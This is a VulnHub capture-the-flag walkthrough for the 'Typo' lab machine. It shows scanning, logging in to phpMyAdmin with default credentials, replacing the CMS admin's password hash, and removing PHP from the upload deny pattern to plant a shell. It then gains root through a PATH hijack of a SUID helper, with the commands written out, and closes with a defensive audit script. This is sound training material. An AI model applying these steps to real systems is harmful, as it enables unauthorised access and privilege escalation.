Let’s do another cool VulnHub machine, this one by Akanksha Verma.
Goal: Get the root flag of the target.
Difficulty: Medium/Intermediate Level
Note: set the domain name typo.local for the target.
Lab Setup:-
Download the machine from the link and import it into VirtualBox.
Let’s start with reconnaissance.
Here is the machine’s welcome message and its IP.
In my case the IP is 192.168.1.208.
Let’s start a quick scan.
Scanning:-
The quick scan showed multiple open ports.
Here is the complete Nmap scan report:
┌──(danial㉿kali)-[~/Desktop/InfosecWarrior/Typo]
└─$ nmap -sV -sC -v -A -oA nmap -p- 192.168.1.208
Nmap scan report for 192.168.1.208
Host is up (0.00031s latency).
Not shown: 65530 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 cd:dc:8f:24:51:73:54:bc:87:62:a2:e6:ed:f1:c1:b4 (RSA)
| 256 a9:39:a9:bf:b2:f7:01:22:65:07:be:15:48:e8:ef:11 (ECDSA)
|_ 256 77:f5:a9:ff:a6:44:7c:9c:34:41:f1:ec:73:5e:57:bd (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Page Not Found
8000/tcp open http Apache httpd 2.4.38
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
| http-open-proxy: Potentially OPEN proxy.
|_Methods supported:CONNECTION
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Did not follow redirect to http://typo.local
8080/tcp open http Apache httpd 2.4.38 ((Debian))
| http-methods:
|_ Supported Methods: HEAD GET POST OPTIONS
|_http-open-proxy: Proxy might be redirecting requests
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Site doesn't have a title (text/html).
8081/tcp open http Apache httpd 2.4.38 ((Debian))
| http-methods:
|_ Supported Methods: HEAD GET POST OPTIONS
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Site doesn't have a title (text/html).
Service Info: Host: 127.0.0.1; OS: Linux; CPE: cpe:/o:linux:linux_kernel
On port 80 I got nothing but an error message,
so I pointed the typo.local hostname at the IP and found a simple page with a Hello User message.
So I ran gobuster and found the admin panel of the CMS.
I tried the default creds, but they didn’t work.
So I moved on to the other ports to look for something like phpMyAdmin, because a CMS can’t run without a database.
On port 8080 I found nothing but a blank page, and dirb and gobuster gave no results either.
On port 8081 I found only the hello message,
so I ran dirb against port 8081 and found phpMyAdmin.
I tried the default credentials and they worked,
and I got the admin password hash.
Googling the hash format turned up a repo on GitHub, but I was unable to crack the password, even with an online tool, so I decided to generate a new hash and update it in the database.
From this website, I generated an argon2id hash.
While looking for a way to upload a shell, I found a deny entry in the configuration.
Let’s quickly update it: remove the PHP entry from the file deny pattern.
Settings > Configure Installation-Wide Options > Backend > [BE][fileDenyPattern]
Then upload a shell.
So we got a shell.
Now it’s time for privilege escalation.
I found apache2-restart with the SUID bit set.
Running strings on it showed that it starts the apache2 service by calling a command by its bare name rather than a full path.
So now let’s go after the PATH variable.
www-data@typo:/$ cd /tmp
cd /tmp
www-data@typo:/tmp$ echo "/bin/bash" > service
echo "/bin/bash" > service
www-data@typo:/tmp$ echo $PATH
echo $PATH
/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
www-data@typo:/tmp$ export PATH=/tmp:$PATH
export PATH=/tmp:$PATH
www-data@typo:/tmp$ ECHO $path
ECHO $path
bash: ECHO: command not found
www-data@typo:/tmp$ echo $PATH
echo $PATH
/tmp:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
www-data@typo:/tmp$
With all the necessary steps done, let’s run the apache2-restart command.
Got root!
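As an added defensive example (not code from this writeup or from the box), here is a small sh audit that flags SUID-root binaries with the weakness used above: a command called by bare name while PATH is left to the caller. It assumes the helper embeds its command line as a plain string, as strings showed here; the function names are hypothetical.

```shell
#!/bin/sh
# Added example, not part of the original writeup: audit SUID helpers for
# programs invoked by bare name (PATH-dependent), e.g. "service apache2 restart".
# Assumptions: POSIX sh with tr, grep and find; the command line is embedded
# as a printable string in the binary. Function names are hypothetical.

# Emulate `strings`: keep runs of at least 4 printable characters.
printable_strings() {
    tr -c '[:print:]' '\n' < "$1" | grep -E '^.{4,}$' || true
}

# Embedded strings that look like a command line whose program has no
# leading slash, e.g. "service apache2 restart" but not "/usr/sbin/service ...".
relative_commands() {
    printable_strings "$1" |
        grep -E '^[a-z][a-z0-9_.-]*([[:space:]]+[^[:space:]]+)+$' || true
}

# True if the binary appears to pin PATH itself before running anything.
pins_path() {
    printable_strings "$1" | grep -q '^PATH='
}

# Report SUID-root files that call something by bare name without pinning PATH.
audit_suid_binaries() {
    find / -xdev -type f -perm -4000 -user root 2>/dev/null | while read -r f; do
        cmds=$(relative_commands "$f")
        if [ -n "$cmds" ] && ! pins_path "$f"; then
            printf 'RISK %s\n' "$f"
            printf '%s\n' "$cmds" | sed 's/^/    calls: /'
        fi
    done
}

# Run the full scan only when asked, so the helpers can be sourced on their own.
if [ "${1-}" = "--scan" ]; then
    audit_suid_binaries
fi
```

Run it with `--scan` on the target as root; the fix for any hit is to call the program by absolute path or to set PATH inside the helper before running it.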
Awesome beginner-level machine.
Happy hacking!